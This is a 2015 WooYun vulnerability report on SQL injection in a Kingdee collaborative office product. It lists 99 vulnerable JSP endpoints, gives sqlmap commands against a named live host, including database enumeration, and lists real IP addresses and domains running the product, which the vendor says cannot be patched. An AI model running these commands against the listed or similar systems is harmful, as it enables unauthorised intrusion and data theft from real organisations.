当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140344

漏洞标题:金蝶协作办公系统存在99个高危SQL注射

相关厂商:金蝶

漏洞作者: 路人甲

提交时间:2015-09-11 12:23

修复时间:2015-12-13 09:29

公开时间:2015-12-13 09:29

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-11: 细节已通知厂商并且等待厂商处理中
2015-09-14: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-11-08: 细节向核心白帽子及相关领域专家公开
2015-11-18: 细节向普通白帽子公开
2015-11-28: 细节向实习白帽子公开
2015-12-13: 细节向公众公开

简要描述:

金蝶协作办公系统存在99个高危SQL注射

详细说明:

“为保护客户利益,不在接受任何漏洞通报”
既然你们都这样说了,还是继续发漏洞吧 希望能纠正错误的观念
存在漏洞的文件,总共有3个文件 但分布在33个目录下面,3*33=99个

/portal/portlet/custom_Analytical/set.jsp
/portal/portlet/custom_Analytical_diagram/set.jsp
/portal/portlet/document/set.jsp
/portal/portlet/document_req/set.jsp
/portal/portlet/flow_performance_list/set.jsp
/portal/portlet/flow_performance_show/set.jsp
/portal/portlet/guestbook/set.jsp
/portal/portlet/guestbook_new/set.jsp
/portal/portlet/news_photos/set.jsp
/portal/portlet/office_history/set.jsp
/portal/portlet/office_process/set.jsp
/portal/portlet/outpage/set.jsp
/portal/portlet/person_doc_list/set.jsp
/portal/portlet/person_mail/set.jsp
/portal/portlet/person_new_doc/set.jsp
/portal/portlet/person_new_mail/set.jsp
/portal/portlet/person_new_plan/set.jsp
/portal/portlet/person_plan/set.jsp
/portal/portlet/pubinfo_bbs/set.jsp
/portal/portlet/pubinfo_db_conn/set.jsp
/portal/portlet/pubinfo_discuss/set.jsp
/portal/portlet/pubinfo_images/set.jsp
/portal/portlet/pubinfo_links/set.jsp
/portal/portlet/pubinfo_news/set.jsp
/portal/portlet/pubinfo_new_bbs/set.jsp
/portal/portlet/pubinfo_new_discuss/set.jsp
/portal/portlet/pubinfo_new_links/set.jsp
/portal/portlet/pubinfo_new_news/set.jsp
/portal/portlet/pubinfo_new_onLine/set.jsp
/portal/portlet/pubinfo_onLine/set.jsp
/portal/portlet/pubinfo_url/set.jsp
/portal/portlet/resource/set.jsp
/portal/portlet/userlink/set.jsp
/portal/portlet/custom_Analytical/set_submit.jsp
/portal/portlet/custom_Analytical_diagram/set_submit.jsp
/portal/portlet/document/set_submit.jsp
/portal/portlet/document_req/set_submit.jsp
/portal/portlet/flow_performance_list/set_submit.jsp
/portal/portlet/flow_performance_show/set_submit.jsp
/portal/portlet/guestbook/set_submit.jsp
/portal/portlet/guestbook_new/set_submit.jsp
/portal/portlet/news_photos/set_submit.jsp
/portal/portlet/office_history/set_submit.jsp
/portal/portlet/office_process/set_submit.jsp
/portal/portlet/outpage/set_submit.jsp
/portal/portlet/person_doc_list/set_submit.jsp
/portal/portlet/person_mail/set_submit.jsp
/portal/portlet/person_new_doc/set_submit.jsp
/portal/portlet/person_new_mail/set_submit.jsp
/portal/portlet/person_new_plan/set_submit.jsp
/portal/portlet/person_plan/set_submit.jsp
/portal/portlet/pubinfo_bbs/set_submit.jsp
/portal/portlet/pubinfo_db_conn/set_submit.jsp
/portal/portlet/pubinfo_discuss/set_submit.jsp
/portal/portlet/pubinfo_images/set_submit.jsp
/portal/portlet/pubinfo_links/set_submit.jsp
/portal/portlet/pubinfo_news/set_submit.jsp
/portal/portlet/pubinfo_new_bbs/set_submit.jsp
/portal/portlet/pubinfo_new_discuss/set_submit.jsp
/portal/portlet/pubinfo_new_links/set_submit.jsp
/portal/portlet/pubinfo_new_news/set_submit.jsp
/portal/portlet/pubinfo_new_onLine/set_submit.jsp
/portal/portlet/pubinfo_onLine/set_submit.jsp
/portal/portlet/pubinfo_url/set_submit.jsp
/portal/portlet/resource/set_submit.jsp
/portal/portlet/userlink/set_submit.jsp
/portal/portlet/custom_Analytical/view.jsp
/portal/portlet/custom_Analytical_diagram/view.jsp
/portal/portlet/document/view.jsp
/portal/portlet/document_req/view.jsp
/portal/portlet/flow_performance_list/view.jsp
/portal/portlet/flow_performance_show/view.jsp
/portal/portlet/guestbook/view.jsp
/portal/portlet/guestbook_new/view.jsp
/portal/portlet/news_photos/view.jsp
/portal/portlet/office_history/view.jsp
/portal/portlet/office_process/view.jsp
/portal/portlet/outpage/view.jsp
/portal/portlet/person_doc_list/view.jsp
/portal/portlet/person_mail/view.jsp
/portal/portlet/person_new_doc/view.jsp
/portal/portlet/person_new_mail/view.jsp
/portal/portlet/person_new_plan/view.jsp
/portal/portlet/person_plan/view.jsp
/portal/portlet/pubinfo_bbs/view.jsp
/portal/portlet/pubinfo_db_conn/view.jsp
/portal/portlet/pubinfo_discuss/view.jsp
/portal/portlet/pubinfo_images/view.jsp
/portal/portlet/pubinfo_links/view.jsp
/portal/portlet/pubinfo_news/view.jsp
/portal/portlet/pubinfo_new_bbs/view.jsp
/portal/portlet/pubinfo_new_discuss/view.jsp
/portal/portlet/pubinfo_new_links/view.jsp
/portal/portlet/pubinfo_new_news/view.jsp
/portal/portlet/pubinfo_new_onLine/view.jsp
/portal/portlet/pubinfo_onLine/view.jsp
/portal/portlet/pubinfo_url/view.jsp
/portal/portlet/resource/view.jsp
/portal/portlet/userlink/view.jsp


由于均存在说这三个文件,随便选择一个目录下的文件做测试,这里为document目录:

sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/portal/portlet/document/set.jsp?portal_id=1"

1.png


sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/portal/portlet/document/set_submit.jsp?portlet_id=1"

2.png


sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/portal/portlet/document/view.jsp?portal_id=1&portlet_id=1"

3.png


sqlmap测试的数据:

sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/portal/portlet/document/set.jsp?portal_id=1" --dbs

data.png


案例:

http://oa.guanhao.com:8080/kingdee/login/loginpage.jsp
http://222.179.238.182:8082/kingdee/login/loginpage2.jsp
http://221.4.245.218:8080/kingdee/login/loginpage.jsp
http://220.189.244.202:8080/kingdee/login/loginpage.jsp
http://222.133.44.10:8080/kingdee/login/loginpage.jsp
http://60.194.110.187/kingdee/login/loginpage.jsp
http://oa.roen.cn/kingdee/login/loginpage.jsp
http://221.226.149.17:8080/kingdee/login/loginpage.jsp
http://221.226.149.17:8080/kingdee/login/loginpage.jsp
http://223.95.183.6:8080/kingdee/login/loginpage.jsp
http://122.139.60.103:800/kingdee/login/loginpage.jsp
http://222.134.77.23:8080/kingdee/login/loginpage.jsp
http://61.190.20.51/kingdee/login/loginpage.jsp

漏洞证明:

sqlmap.py -u "http://oa.guanhao.com:8080/kingdee/portal/portlet/document/set.jsp?portal_id=1" --dbs

data.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-12-13 09:29

厂商回复:


白帽子兄弟们,这个产品是金蝶公司多年前代理的上海协达公司产品,上海协达公司回复无法打补丁修复漏洞,只有升级替换产品,所以无法短期内处理。 对于白帽子的付出,我们一直表示肯定和支持,也一起会根据情况给予奖励,未来还会加入奖励!希望大家继续关注金蝶安全!

最新状态:

暂无